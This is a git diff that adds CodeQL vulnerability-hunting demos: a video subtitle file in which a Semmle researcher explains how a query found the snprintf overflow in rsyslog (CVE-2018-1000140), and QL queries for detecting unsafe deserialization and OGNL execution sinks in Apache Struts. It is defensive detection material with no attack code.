file mode 100644 index 0000000..f18de68 --- /dev/null +++ b/ql_demos/cpp/rsyslog_CVE-2018-1000140/Video/rsyslog.srt @@ -0,0 +1,1200 @@ +1 +00:00:00,847 --> 00:00:04,148 +Hello, my name is Kevin Backhouse, +and I'm a security researcher + +2 +00:00:04,177 --> 00:00:04,860 +at Semmle. + +3 +00:00:04,884 --> 00:00:08,139 +This video is about a vulnerability that was found + +4 +00:00:08,173 --> 00:00:09,665 +by my colleague Bas van Schaik + +5 +00:00:09,757 --> 00:00:11,628 +in the rsyslog project. + +6 +00:00:12,742 --> 00:00:15,456 +What I'm going to do in this video is explain a bit + +7 +00:00:15,511 --> 00:00:18,049 +about what the vulnerability was. + +8 +00:00:18,083 --> 00:00:19,736 +I'm also going to show you + +9 +00:00:20,341 --> 00:00:25,353 +how you can use QL to search + +10 +00:00:25,398 --> 00:00:27,231 +for the vulnerability-- + +11 +00:00:27,277 --> 00:00:29,560 +the coding pattern that caused this vulnerability. + +12 +00:00:30,264 --> 00:00:32,338 +I'm going to show how easy that is to do in QL. + +13 +00:00:34,338 --> 00:00:41,480 +Rsyslog is an open source logging system maintained + +14 +00:00:41,526 --> 00:00:42,827 +by Rainer Gerhards. + +15 +00:00:45,337 --> 00:00:51,288 +We reported this vulnerability to him +and he fixed it incredibly quickly. + +16 +00:00:51,318 --> 00:00:52,280 +I think it was only + +17 +00:00:52,304 --> 00:00:54,808 +about 24 hours between the time + +18 +00:00:54,846 --> 00:00:56,745 +that we reported the vulnerability to him + +19 +00:00:56,791 --> 00:00:59,575 +and the time that he had posted a fix + +20 +00:00:59,631 --> 00:01:01,041 +for it on GitHub. + +21 +00:01:02,034 --> 00:01:03,262 +Something I'd also +like to point out + +22 +00:01:03,280 --> 00:01:07,011 +about rsyslog, is that Rainer takes security + +23 +00:01:07,057 --> 00:01:09,710 +or quality incredibly seriously. + +24 +00:01:10,357 --> 00:01:12,639 +He runs all the static analysis + +25 +00:01:12,668 --> 00:01:14,150 +and dynamic analysis tools + +26 +00:01:14,648 --> 00:01:16,032 +that he can get his hands on on this project. + +27 +00:01:16,740 --> 00:01:20,756 +This was a bug that had not been detected + +28 +00:01:20,796 --> 00:01:22,220 +by any of those other tools. + +29 +00:01:27,144 --> 00:01:30,633 +That shows the value of Semmle's technology + +30 +00:01:30,761 --> 00:01:34,320 +that we can find problems that get missed + +31 +00:01:34,375 --> 00:01:36,818 +by other tools. + +32 +00:01:39,563 --> 00:01:46,722 +Now, the backstory behind this vulnerability +is that towards the end of 2017, + +33 +00:01:46,775 --> 00:01:47,888 +I was looking at this code + +34 +00:01:47,923 --> 00:01:49,073 +in the curl project. + +35 +00:01:52,560 --> 00:01:54,993 +I'd never seen this coding pattern before. + +36 +00:01:55,038 --> 00:01:58,666 +I didn't even know that snprintf had a return value, + +37 +00:01:58,697 --> 00:02:01,654 +so I was quite interested to see this coding pattern. + +38 +00:02:02,891 --> 00:02:05,427 +It's quite clever the way that it's being used here. + +39 +00:02:05,481 --> 00:02:08,555 +What they're doing is they're printing + +40 +00:02:08,746 --> 00:02:11,748 +a list of strings into a fixed size buffer, + +41 +00:02:12,699 --> 00:02:14,155 +and they're using + +42 +00:02:14,209 --> 00:02:15,858 +the return value of snprintf + +43 +00:02:16,145 --> 00:02:19,792 +to keep track of what offset + +44 +00:02:19,813 --> 00:02:22,181 +in the buffer they need to print to next. + +45 +00:02:23,898 --> 00:02:27,807 +They're using the size argument of snprintf + +46 +00:02:27,849 --> 00:02:30,809 +to make sure that they don't write + +47 +00:02:31,229 --> 00:02:32,689 +beyond the end of the buffer. + +48 +00:02:34,282 --> 00:02:38,444 +Because I'd never seen snprintf used + +49 +00:02:38,475 --> 00:02:40,683 +like this before, I pulled up the man page + +50 +00:02:40,731 --> 00:02:45,363 +for snprintf to see how it works. + +51 +00:02:50,241 --> 00:02:52,487 +Now, if we search for RETURN here, + +52 +00:02:52,525 --> 00:02:54,711 +we get the documentation on the return value. + +53 +00:02:55,532 --> 00:02:56,982 +There's a very interesting thing here. + +54 +00:02:59,052 --> 00:03:01,409 +It says that the return value + +55 +00:03:01,447 --> 00:03:02,695 +is the number of characters + +56 +00:03:02,742 --> 00:03:04,385 +which would have been written + +57 +00:03:04,437 --> 00:03:07,323 +to the final string if enough space had been available. + +58 +00:03:10,686 --> 00:03:13,830 +What that means is that this code + +59 +00:03:13,881 --> 00:03:16,236 +that we just saw in curl looks unsafe. + +60 +00:03:16,959 --> 00:03:21,668 +Because if there's a string that is too big, + +61 +00:03:22,791 --> 00:03:29,451 +it exceeds this value, then, +if say the string is 100 bytes + +62 +00:03:29,497 --> 00:03:34,446 +but there's only 10 bytes left in the buffer, +then ptr is still going to get incremented + +63 +00:03:34,477 --> 00:03:36,164 +by 100 bytes + +64 +00:03:36,731 --> 00:03:40,292 +and so on the next iteration of the loop, we can continue, + +65 +00:03:40,888 --> 00:03:42,419 +and we're going to continue printing. + +66 +00:03:42,608 --> 00:03:52,317 +What's worse is that this sizeof subtraction here + +67 +00:03:52,349 --> 00:03:56,230 +is actually going to compute +the answer minus 90, + +68 +00:03:56,500 --> 00:04:00,731 +but the input to snprintf, +the size input to snprintf, + +69 +00:04:00,761 --> 00:04:02,537 +is a size_t, it's an unsigned value. + +70 +00:04:03,140 --> 00:04:05,724 +We're going to get a negative integer overflow here. + +71 +00:04:07,506 --> 00:04:09,093 +That means that there's going to be effectively + +72 +00:04:09,122 --> 00:04:11,146 +no limit on the number of bytes + +73 +00:04:11,342 --> 00:04:13,270 +that we can write to the buffer. + +74 +00:04:14,108 --> 00:04:17,861 +Now, it turns out that +this is not actually a problem in curl, + +75 +00:04:17,907 --> 00:04:20,720 +because they've got +their own implementation of snprintf, + +76 +00:04:20,755 --> 00:04:21,755 +which you can see here. + +77 +00:04:23,520 --> 00:04:27,530 +This version of snprintf works the way + +78 +00:04:27,530 --> 00:04:31,479 +that you need it to in order +to use this coding pattern. + +79 +00:04:32,453 --> 00:04:34,285 +So, it returns the number of bytes + +80 +00:04:34,316 --> 00:04:36,303 +that it actually wrote rather than the number of bytes + +81 +00:04:36,351 --> 00:04:37,776 +that it wanted to write. + +82 +00:04:38,800 --> 00:04:39,932 +There's no problem in curl, + +83 +00:04:40,066 --> 00:04:42,961 +but after having seen this coding pattern, + +84 +00:04:43,007 --> 00:04:44,007 +I thought, + +85 +00:04:44,333 --> 00:04:45,318 +"Well, I wonder if anybody else + +86 +00:04:45,342 --> 00:04:48,184 +has done the same thing +but using the real snprintf. + +87 +00:04:48,205 --> 00:04:49,205 +Because if they have, + +88 +00:04:49,657 --> 00:04:52,623 +then they might have a buffer overflow in their code." + +89 +00:04:54,869 --> 00:04:58,695 +Let's now go to Eclipse and use QL to search + +90 +00:04:58,742 --> 00:05:00,662 +for this vulnerability. + +91 +00:05:02,677 --> 00:05:04,543 +What I'm going to do first is something + +92 +00:05:04,572 --> 00:05:06,727 +that you could do equally well + +93 +00:05:06,926 --> 00:05:07,952 +with grep, + +94 +00:05:07,987 --> 00:05:11,476 +but we're very quickly going to refine + +95 +00:05:11,517 --> 00:05:12,517 +this query to something + +96 +00:05:12,573 --> 00:05:14,320 +that is much more sophisticated + +97 +00:05:14,373 --> 00:05:15,111 +than what you can do + +98 +00:05:15,135 --> 00:05:16,135 +with grep. + +99 +00:05:16,704 --> 00:05:18,518 +To begin with, I'm just going to search + +100 +00:05:18,551 --> 00:05:22,034 +for all calls to snprintf in the project. + +101 +00:05:32,752 --> 00:05:33,875 +108 results. + +102 +00:05:35,123 --> 00:05:41,282 +Now, 108 results is not that many. + +103 +00:05:41,707 --> 00:05:44,095 +You could realistically audit all of these + +104 +00:05:44,134 --> 00:05:45,199 +by hand. + +105 +00:05:48,111 --> 00:05:51,302 +One of our customers actually had + +106 +00:05:51,350 --> 00:05:57,018 +this exact same vulnerability on some proprietary code. + +107 +00:05:59,587 --> 00:06:02,190 +If you were to run this query on their code base, + +108 +00:06:02,234 --> 00:06:04,692 +then you'd get over 600 results. + +109 +00:06:06,042 --> 00:06:08,568 +That's going to be quite tedious to look through + +110 +00:06:08,614 --> 00:06:09,614 +by hand. + +111 +00:06:10,135 --> 00:06:13,291 +QL can really help you, save you some time + +112 +00:06:13,464 --> 00:06:16,270 +by quickly ruling out the cases + +113 +00:06:16,334 --> 00:06:18,508 +that are not interesting to look at. + +114 +00:06:18,545 --> 00:06:24,296 +The most common reason that the call to snprintf + +115 +00:06:24,343 --> 00:06:26,143 +is safe is that you're just not using + +116 +00:06:26,188 --> 00:06:27,974 +the return value of snprintf. + +117 +00:06:28,565 --> 00:06:32,051 +Let's update the query to rule out those cases. + +118 +00:06:37,864 --> 00:06:42,013 +We just want to say that the call is not in a void context. + +119 +00:06:46,533 --> 00:06:53,463 +If we run the query that way, +then we're now down to 45 results. + +120 +00:06:54,612 --> 00:06:55,803 +Now, let's look at one of these. + +121 +00:06:58,149 --> 00:07:04,102 +This is another common reason +that it's unlikely to be a problem, + +122 +00:07:04,590 --> 00:07:09,918 +this format specifier contains only a %d. + +123 +00:07:11,623 --> 00:07:14,164 +Now, a %d is going to be quite difficult + +124 +00:07:14,199 --> 00:07:18,197 +for an attacker to do anything with, + +125 +00:07:18,956 --> 00:07:23,398 +because the number of bytes + +126 +00:07:23,429 --> 00:07:24,376 +that you can generate + +127 +00:07:24,400 --> 00:07:25,902 +with a %d is limited + +128 +00:07:25,902 --> 00:07:30,317 +and also the content of the string + +129 +00:07:30,349 --> 00:07:31,349 +that you can generate + +130 +00:07:31,373 --> 00:07:33,365 +with it is quite limited, + +131 +00:07:33,415 --> 00:07:36,326 +because you can only generate ASCII digits + +132 +00:07:36,813 --> 00:07:39,693 +rather than an arbitrary list of characters. + +133 +00:07:40,212 --> 00:07:43,934 +What an attacker is really +going to want is a %s, + +134 +00:07:43,934 --> 00:07:47,802 +because that allows them to control both + +135 +00:07:47,900 --> 00:07:49,746 +the size of the string that's generated + +136 +00:07:49,794 --> 00:07:51,343 +and also the exact content + +137 +00:07:51,343 --> 00:07:52,848 +of the string that's generated. + +138 +00:07:53,994 --> 00:07:55,678 +Something that I would also like to point out + +139 +00:07:55,710 --> 00:08:01,583 +about this example is that we're now looking +at a call to snprintf that is not all in one line. + +140 +00:08:01,941 --> 00:08:05,405 +That's quickly going to become a pain to search + +141 +00:08:05,452 --> 00:08:07,033 +for with regular expressions. + +142 +00:08:07,196 --> 00:08:09,855 +When you're searching with QL, + +143 +00:08:10,199 --> 00:08:11,388 +that's not a problem at all, + +144 +00:08:11,439 --> 00:08:13,341 +because we're looking + +145 +00:08:13,387 --> 00:08:15,405 +at the abstract syntax tree of the code + +146 +00:08:15,440 --> 00:08:17,271 +rather than just doing text based searching. + +147 +00:08:19,769 --> 00:08:21,716 +What we're going to do here is we're going to add + +148 +00:08:21,748 --> 00:08:24,715 +a condition that the format specifier + +149 +00:08:24,777 --> 00:08:26,578 +should contain a %s. + +150 +00:08:30,815 --> 00:08:35,082 +We use zero-based indexing +for the arguments of a call. + +151 +00:08:35,131 --> 00:08:38,075 +The format specifier is going to be argument number two, + +152 +00:08:38,602 --> 00:08:40,710 +and we can get the string + +153 +00:08:40,763 --> 00:08:41,530 +like this + +154 +00:08:41,554 --> 00:08:43,820 +and then we can do regular expression matching on it + +155 +00:08:43,911 --> 00:08:44,911 +like this. + +156 +00:08:46,911 --> 00:08:49,762 +We want it to contain some stuff followed + +157 +00:08:49,792 --> 00:08:51,959 +by a %s, followed + +158 +00:08:51,990 --> 00:08:53,023 +by some more stuff. + +159 +00:08:54,836 --> 00:08:55,537 +Now, by default, + +160 +00:08:55,561 --> 00:09:00,942 +regular expressions don't match strings + +161 +00:09:00,942 --> 00:09:02,578 +that contain a newline character. + +162 +00:09:05,687 --> 00:09:07,505 +Format strings very frequently + +163 +00:09:07,553 --> 00:09:09,304 +do contain newline characters. + +164 +00:09:09,751 --> 00:09:14,387 +We're going to add this special syntax here. + +165 +00:09:14,435 --> 00:09:17,973 +We're using Java's regular expression syntax. + +166 +00:09:18,413 --> 00:09:20,345 +That's how you tell it to + +167 +00:09:20,400 --> 00:09:23,277 +also match strings that contain newline characters. + +168 +00:09:24,725 --> 00:09:25,725 +Let's run that now. + +169 +00:09:27,125 --> 00:09:28,863 +Now we're down to 18 results. + +170 +00:09:30,807 --> 00:09:32,197 +Let's have a look at some of these. + +171 +00:09:33,059 --> 00:09:36,781 +Now, that one is in fact, the vulnerability. + +172 +00:09:37,302 --> 00:09:38,616 +We'll get back to that later. + +173 +00:09:38,663 --> 00:09:39,406 +Let's first look + +174 +00:09:39,430 --> 00:09:40,496 +at some others to see + +175 +00:09:42,498 --> 00:09:44,140 +which other ones we might want to rule out. + +176 +00:09:44,167 --> 00:09:47,422 +This is an example of a result + +177 +00:09:47,465 --> 00:09:48,715 +that we're not interested in + +178 +00:09:48,762 --> 00:09:53,146 +because here the result of the return value +of snprintf is being used, + +179 +00:09:53,179 --> 00:09:54,603 +but it's being used in a safe way + +180 +00:09:54,662 --> 00:09:57,065 +because we're using it to check that + +181 +00:09:57,102 --> 00:10:02,068 +it didn't want to write +more characters than we expected. + +182 +00:10:03,325 --> 00:10:09,279 +Really, the vulnerability that we're looking +for is the case where you have a loop, + +183 +00:10:10,125 --> 00:10:15,276 +and the output of snprintf is getting fed back + +184 +00:10:15,316 --> 00:10:17,840 +into the size parameter of snprintf. + +185 +00:10:17,876 --> 00:10:24,831 +That's what allows the buffer overflow to happen, + +186 +00:10:24,880 --> 00:10:28,059 +and also the negative integer overflow here, + +187 +00:10:28,172 --> 00:10:32,182 +which is essential in order to have the vulnerability. + +188 +00:10:34,018 --> 00:10:35,347 +What I'm going to do now is + +189 +00:10:35,403 --> 00:10:37,876 +I'm going to use one of our libraries, + +190 +00:10:37,911 --> 00:10:39,466 +I'm going to use the taint tracking library + +191 +00:10:39,483 --> 00:10:41,700 +to see if there's data flow + +192 +00:10:42,313 --> 00:10:45,658 +from the output back into the size argument. + +193 +00:10:49,160 --> 00:10:51,094 +I have to have an import statement first. + +194 +00:10:56,484 --> 00:11:00,078 +I'm going to import dataflow's TaintTracking library. + +195 +00:11:03,790 --> 00:11:08,162 +Then we're going to add a source and a sink. + +196 +00:11:09,222 --> 00:11:11,531 +Normally, when you use the TaintTracking library, + +197 +00:11:11,832 --> 00:11:13,110 +the source would be something + +198 +00:11:13,175 --> 00:11:15,180 +that you believe to be tainted + +199 +00:11:15,211 --> 00:11:17,804 +because it's controllable by an attacker, + +200 +00:11:18,649 --> 00:11:22,101 +and the sink would be a place + +201 +00:11:22,157 --> 00:11:23,645 +where it's used in a dangerous way. + +202 +00:11:25,241 --> 00:11:26,241 +QL is flexible, + +203 +00:11:26,473 --> 00:11:27,517 +and so we can use it + +204 +00:11:27,896 --> 00:11:31,753 +for this kind of situation +as well which is slightly different, + +205 +00:11:31,829 --> 00:11:32,922 +where we're going to just say, + +206 +00:11:33,483 --> 00:11:36,065 +"I want the source to be the call to snprintf, + +207 +00:11:36,110 --> 00:11:41,137 +and I want the sink to be the size argument of snprintf." + +208 +00:11:42,214 --> 00:11:43,538 +It will do that equally well. + +209 +00:11:48,139 --> 00:11:49,298 +"call" is the source, + +210 +00:11:50,066 --> 00:12:00,507 +and the sink is the size argument. + +211 +00:12:05,733 --> 00:12:06,733 +In fact, + +212 +00:12:06,998 --> 00:12:10,367 +because the call is the source of the data flow, + +213 +00:12:12,068 --> 00:12:13,059 +this thing + +214 +00:12:13,083 --> 00:12:16,273 +about it being in a void context is now redundant, + +215 +00:12:16,303 --> 00:12:18,431 +so we can remove that +from the query if we want. + +216 +00:12:19,629 --> 00:12:21,040 +It would be harmless if we left it in. + +217 +00:12:22,772 --> 00:12:23,632 +Now, we need to actually + +218 +00:12:23,656 --> 00:12:25,618 +use the TaintTracking library + +219 +00:12:25,671 --> 00:12:26,713 +to connect up the source + +220 +00:12:26,762 --> 00:12:27,786 +and the sink. + +221 +00:12:31,730 --> 00:12:35,276 +We only need to look for local data flow, + +222 +00:12:35,325 --> 00:12:38,469 +that means within the function. +For this particular pattern, + +223 +00:12:39,108 --> 00:12:41,790 +it's always going to be within a single function. + +224 +00:12:42,074 --> 00:12:43,909 +In general, our TaintTracking library + +225 +00:12:44,522 --> 00:12:48,845 +supports interprocedural taint tracking as well, + +226 +00:12:49,177 --> 00:12:50,000 +we just don't need it here, + +227 +00:12:50,023 --> 00:12:52,202 +so that's why we're using the localTaint function. + +228 +00:12:56,102 --> 00:12:57,500 +Let's run that. + +229 +00:12:58,193 --> 00:13:04,690 +Now we have exactly one result, +which is the vulnerability right here. + +230 +00:13:05,637 --> 00:13:07,283 +Now, there's one final thing + +231 +00:13:07,283 --> 00:13:08,642 +that I'd like to show you. + +232 +00:13:09,184 --> 00:13:16,074 +It's often useful to use range analysis + +233 +00:13:16,113 --> 00:13:20,330 +to see what sizes we're able to deduce. + +234 +00:13:21,064 --> 00:13:25,794 +In this particular case, we're interested +in the size argument into snprintf. + +235 +00:13:25,794 --> 00:13:29,793 +If we were to apply range analysis to it + +236 +00:13:29,838 --> 00:13:35,206 +and find out that it has an upper bound of 10, +then there's probably nothing wrong. + +237 +00:13:36,580 --> 00:13:39,646 +I'm just going to show you +how to use the range analysis library. + +238 +00:13:40,435 --> 00:13:41,685 +We need to import it like this, + +239 +00:13:46,968 --> 00:13:52,405 +and then we can just add +an extra column to the results list. + +240 +00:13:53,083 --> 00:13:54,253 +We're going to include + +241 +00:13:54,290 --> 00:13:57,858 +the upper bound of the size argument. + +242 +00:14:04,174 --> 00:14:09,012 +What I'm also going to do is I'm going to apply +getFullyConverted to the size argument. + +243 +00:14:12,062 --> 00:14:13,089 +Just run that now. + +244 +00:14:15,174 --> 00:14:22,655 +When you call a function like snprintf, +the argument that it expects is a size_t, + +245 +00:14:22,688 --> 00:14:25,525 +so an unsigned integer. + +246 +00:14:27,172 --> 00:14:29,790 +Now, if the argument + +247 +00:14:29,821 --> 00:14:30,750 +that you pass in is something + +248 +00:14:30,774 --> 00:14:32,121 +like an int, then there's going + +249 +00:14:32,121 --> 00:14:33,334 +to be an implicit conversion, + +250 +00:14:33,931 --> 00:14:35,308 +and those implicit conversions + +251 +00:14:35,347 --> 00:14:38,742 +can often be the source of integer overflows. + +252 +00:14:39,222 --> 00:14:41,125 +In this particular case, + +253 +00:14:42,859 --> 00:14:44,381 +the reason that there's a problem is + +254 +00:14:44,428 --> 00:14:49,835 +because we subtract something from this size, + +255 +00:14:50,521 --> 00:14:53,446 +and we get a negative integer overflow, + +256 +00:14:53,821 --> 00:14:56,900 +which means that the size parameter +that we call snprintf with + +257 +00:14:56,900 --> 00:14:59,917 +is actually a huge 64 bit number. + +258 +00:15:02,924 --> 00:15:04,629 +It's more interesting here to look + +259 +00:15:04,675 --> 00:15:10,505 +at the size of the fully converted argument + +260 +00:15:12,593 --> 00:15:13,627 +so that we can make sure + +261 +00:15:13,663 --> 00:15:17,613 +that we're seeing what's going to happen + +262 +00:15:17,645 --> 00:15:19,624 +after the conversion. + +263 +00:15:19,673 --> 00:15:24,256 +Sure enough, range analysis knows + +264 +00:15:24,334 --> 00:15:26,992 +that there's a possibility +of a negative integer overflow, + +265 +00:15:27,069 --> 00:15:30,106 +and so it's saying that the upper bound + +266 +00:15:30,526 --> 00:15:40,003 +is the full range of 64 bit unsigned numbers. + +267 +00:15:41,613 --> 00:15:42,023 +Okay. + +268 +00:15:42,047 --> 00:15:43,249 +That's the end of the demo. + +269 +00:15:43,809 --> 00:15:49,349 +What I've done is shown you that, using QL, + +270 +00:15:49,400 --> 00:15:52,273 +you can very quickly search for problems + +271 +00:15:52,320 --> 00:15:53,539 +like this. + +272 +00:15:53,840 --> 00:15:56,050 +I started out + +273 +00:15:56,113 --> 00:15:57,930 +with something that is equivalent to grep, + +274 +00:15:57,976 --> 00:15:59,146 +but then I very quickly moved on + +275 +00:15:59,208 --> 00:16:00,890 +to something that is much more powerful. + +276 +00:16:02,318 --> 00:16:05,872 +Now, of course, what we do + +277 +00:16:05,974 --> 00:16:09,144 +at Semmle is we also take queries + +278 +00:16:09,182 --> 00:16:09,904 +like this, + +279 +00:16:09,928 --> 00:16:12,394 +and we turn them into much more polished queries + +280 +00:16:12,412 --> 00:16:15,052 +which can then be included in our default suite. + +281 +00:16:15,386 --> 00:16:18,033 +My colleague Geoffrey White took + +282 +00:16:18,078 --> 00:16:21,206 +this rough query which I wrote in 2017 + +283 +00:16:21,241 --> 00:16:23,504 +and turned it into a much more polished version, + +284 +00:16:23,551 --> 00:16:24,454 +which is now included + +285 +00:16:24,478 --> 00:16:28,858 +in our default suite on lgtm.com. + +286 +00:16:29,340 --> 00:16:32,231 +In fact, it was Geoffrey's version of this query + +287 +00:16:32,782 --> 00:16:36,434 +that found the vulnerability in rsyslog, + +288 +00:16:36,751 --> 00:16:38,579 +and Bas was the one + +289 +00:16:38,579 --> 00:16:40,639 +who was looking through the results + +290 +00:16:40,719 --> 00:16:41,873 +and noticed it, + +291 +00:16:42,208 --> 00:16:44,833 +and that then led to us reporting + +292 +00:16:44,978 --> 00:16:46,590 +the vulnerability to Rainer. + diff --git a/ql_demos/java/.qlpath b/ql_demos/java/.qlpath new file mode 100644 index 0000000..f7ad1ce --- /dev/null +++ b/ql_demos/java/.qlpath @@ -0,0 +1,10 @@ + + + + com.semmle.code.java.library + + com.semmle.code.java.dbscheme + + java + + diff --git a/ql_demos/java/Apache_Struts_CVE-2017-9805/README.md b/ql_demos/java/Apache_Struts_CVE-2017-9805/README.md new file mode 100644 index 0000000..99db29e --- /dev/null +++ b/ql_demos/java/Apache_Struts_CVE-2017-9805/README.md @@ -0,0 +1,7 @@ +[Blog post](https://lgtm.com/blog/apache_struts_CVE-2017-9805) + +[This snapshot](https://downloads.lgtm.com/snapshots/java/apache/struts/apache-struts-91ae344-CVE-2017-9805.zip) has the bug. Also, Mo has greated a copy of the project so that you can see [the result](https://lgtm.com/projects/g/mmosemmle/struts_9805/alerts/?mode=list&id=java%2Funsafe-deserialization) on [lgtm.com](https://lgtm.com/projects/g/mmosemmle/struts_9805). + +This directory contains a copy of `UnsafeDeserialization.qll`, because I get a syntax error when I try to do `import Security.CWE.CWE-502.UnsafeDeserialization`. + +The query is based on an earlier version of one of our default queries: `UnsafeDeserialization.ql`. When Mo discovered the vulnerability, the standard query did not detect the problem. But Mo realized by studying previous vulnerabilities in Struts that [ContentTypeHandler](http://struts.apache.org/maven/struts2-plugins/struts2-rest-plugin/apidocs/org/apache/struts2/rest/handler/ContentTypeHandler.html) is a source of untrusted input in Struts, so he modified the query to make it a taint source. With that modification, the query found the RCE vulnerability. Our Java team have since improved `UnsafeDeserialization.ql` so that it is able to detect this vulnerability, so this is a great example of how the work of the Semmle Security Team helps to improve our queries for all our users. It is interesting to compare the result of Mo's query with the new default query, which you can find in the directory `Security/CWE/CWE-502/`. The source found by the default query is buried deeper in the library than the one found by Mo's query. diff --git a/ql_demos/java/Apache_Struts_CVE-2017-9805/UnsafeDeserialization.qll b/ql_demos/java/Apache_Struts_CVE-2017-9805/UnsafeDeserialization.qll new file mode 100644 index 0000000..d01dc3e --- /dev/null +++ b/ql_demos/java/Apache_Struts_CVE-2017-9805/UnsafeDeserialization.qll @@ -0,0 +1,79 @@ +/** + * This is a copy of UnsafeDeserialization.qll from the QL standard library + * for Java. It is copied here for the purpose of recreating the scenario + * when Mo first discovered the vulnerability. At the time, the standard + * unsafe deserialization query (UnsafeDeserialization.ql) did not detect the + * bug. Mo discovered the vulnerability by customizing the standard query, + * using knowledge that he had about the design of Struts. (The standard query + * has since been improved so that it will automatically detect similar + * vulnerabilities in future.) + */ + +import semmle.code.java.frameworks.Kryo +import semmle.code.java.frameworks.XStream +import semmle.code.java.dataflow.DataFlow + +class ObjectInputStreamReadObjectMethod extends Method { + ObjectInputStreamReadObjectMethod() { + this.getDeclaringType().getASourceSupertype*().hasQualifiedName("java.io", "ObjectInputStream") and + (this.hasName("readObject") or this.hasName("readUnshared")) + } +} + +class XMLDecoderReadObjectMethod extends Method { + XMLDecoderReadObjectMethod() { + this.getDeclaringType().hasQualifiedName("java.beans", "XMLDecoder") and + this.hasName("readObject") + } +} + +class SafeXStream extends DataFlow::Configuration { + SafeXStream() { this = "UnsafeDeserialization::SafeXStream" } + override predicate isSource(DataFlow::Node src) { + any(XStreamEnableWhiteListing ma).getQualifier().(VarAccess).getVariable().getAnAccess() = src.asExpr() + } + override predicate isSink(DataFlow::Node sink) { + exists(MethodAccess ma | + sink.asExpr() = ma.getQualifier() and + ma.getMethod() instanceof XStreamReadObjectMethod + ) + } +} + +class SafeKryo extends DataFlow::Configuration { + SafeKryo() { this = "UnsafeDeserialization::SafeKryo" } + override predicate isSource(DataFlow::Node src) { + any(KryoEnableWhiteListing ma).getQualifier().(VarAccess).getVariable().getAnAccess() = src.asExpr() + } + override predicate isSink(DataFlow::Node sink) { + exists(MethodAccess ma | + sink.asExpr() = ma.getQualifier() and + ma.getMethod() instanceof KryoReadObjectMethod + ) + } +} + +predicate unsafeDeserialization(MethodAccess ma, Expr sink) { + exists(Method m | m = ma.getMethod() | + m instanceof ObjectInputStreamReadObjectMethod and + sink = ma.getQualifier() + or + m instanceof XMLDecoderReadObjectMethod and + sink = ma.getQualifier() + or + m instanceof XStreamReadObjectMethod and + sink = ma.getAnArgument() and + not exists(SafeXStream sxs | sxs.hasFlowToExpr(ma.getQualifier())) + or + m instanceof KryoReadObjectMethod and + sink = ma.getAnArgument() and + not exists(SafeKryo sk | sk.hasFlowToExpr(ma.getQualifier())) + ) +} + +class UnsafeDeserializationSink extends DataFlow::ExprNode { + UnsafeDeserializationSink() { + unsafeDeserialization(_, this.getExpr()) + } + MethodAccess getMethodAccess() { unsafeDeserialization(result, this.getExpr()) } +} diff --git a/ql_demos/java/Apache_Struts_CVE-2017-9805/UnsafeDeserializationStruts.ql b/ql_demos/java/Apache_Struts_CVE-2017-9805/UnsafeDeserializationStruts.ql new file mode 100644 index 0000000..27437fd --- /dev/null +++ b/ql_demos/java/Apache_Struts_CVE-2017-9805/UnsafeDeserializationStruts.ql @@ -0,0 +1,55 @@ +/** + * @name Deserialization of user-controlled data (Apache Struts) + * @description Deserializing user-controlled data may allow attackers to + * execute arbitrary code. + * @kind path-problem + * @problem.severity error + * @precision high + * @id java/unsafe-deserialization + * @tags security + * external/cwe/cwe-502 + */ +import java +import UnsafeDeserialization +import semmle.code.java.dataflow.DataFlow3::DataFlow3 as DF +import DF::PathGraph + +/** The interface `org.apache.struts2.rest.handler.ContentTypeHandler`. */ +class ContentTypeHandler extends RefType { + ContentTypeHandler() { + this.hasQualifiedName("org.apache.struts2.rest.handler", "ContentTypeHandler") + } +} + +/** A `toObject` method on a subtype of `org.apache.struts2.rest.handler.ContentTypeHandler`. */ +class ContentTypeHandlerDeserialization extends Method { + ContentTypeHandlerDeserialization() { + this.getDeclaringType().getASupertype*() instanceof ContentTypeHandler and + this.hasName("toObject") + } +} + +/** + * The first parameter of a `toObject` method on a `ContentTypeHandler`, which is + * a source of tainted user data. + */ +class ContentTypeHandlerInput extends DF::Node { + ContentTypeHandlerInput() { + this.asParameter() = any(ContentTypeHandlerDeserialization des).getParameter(0) + } +} + +/** + * Configuration that tracks the flow of taint from the first parameter of + * `ContentTypeHandler.toObject` to an instance of unsafe deserialization. + */ +class StrutsUnsafeDeserializationConfig extends DF::Configuration { + StrutsUnsafeDeserializationConfig() { this = "StrutsUnsafeDeserializationConfig" } + override predicate isSource(DF::Node source) { source instanceof ContentTypeHandlerInput } + override predicate isSink(DF::Node sink) { sink instanceof UnsafeDeserializationSink } +} + +from DF::PathNode source, DF::PathNode sink, StrutsUnsafeDeserializationConfig conf +where conf.hasFlowPath(source, sink) + and sink.getNode() instanceof UnsafeDeserializationSink +select sink.getNode().(UnsafeDeserializationSink).getMethodAccess(), source, sink, "Unsafe deserialization of $@.", source, "user input" diff --git a/ql_demos/java/Apache_Struts_CVE-2018-11776/01_compileAndExecute.ql b/ql_demos/java/Apache_Struts_CVE-2018-11776/01_compileAndExecute.ql new file mode 100644 index 0000000..9e18fc5 --- /dev/null +++ b/ql_demos/java/Apache_Struts_CVE-2018-11776/01_compileAndExecute.ql @@ -0,0 +1,13 @@ +/** + * @name 01_compileAndExecute + */ + +import java + +/* Find the method named "compileAndExecute". This method is used + * to execute OGNL, so it is going to be the sink of our dataflow + * analysis. + */ +from Method m +where m.getName() = "compileAndExecute" +select m diff --git a/ql_demos/java/Apache_Struts_CVE-2018-11776/02_compileAndExecute.ql b/ql_demos/java/Apache_Struts_CVE-2018-11776/02_compileAndExecute.ql new file mode 100644 index 0000000..747b3e9 --- /dev/null +++ b/ql_demos/java/Apache_Struts_CVE-2018-11776/02_compileAndExecute.ql @@ -0,0 +1,12 @@ +/** + * @name 02_compileAndExecute + */ + +import java + +/* Find calls to "compileAndExecute". */ +from Method m, MethodAccess ma +where + m.getName() = "compileAndExecute" and + ma.getMethod() = m +select m, ma diff --git a/ql_demos/java/Apache_Struts_CVE-2018-11776/03_compileAndExecute.ql b/ql_demos/java/Apache_Struts_CVE-2018-11776/03_compileAndExecute.ql new file mode 100644 index 0000000..e96b143 --- /dev/null +++ b/ql_demos/java/Apache_Struts_CVE-2018-11776/03_compileAndExecute.ql @@ -0,0 +1,14 @@ +/** + * @name 03_compileAndExecute + */ + +import java + +/* We are actually interested in argument 0 of compileAndExecute, + * because that's the string that will get executed. + */ +from Method m, MethodAccess ma +where + m.getName() = "compileAndExecute" and + ma.getMethod() = m +select ma.getArgument(0) diff --git a/ql_demos/java/Apache_Struts_CVE-2018-11776/04_compileAndExecute.ql b/ql_demos/java/Apache_Struts_CVE-2018-11776/04_compileAndExecute.ql new file mode 100644 index 0000000..242d5c5 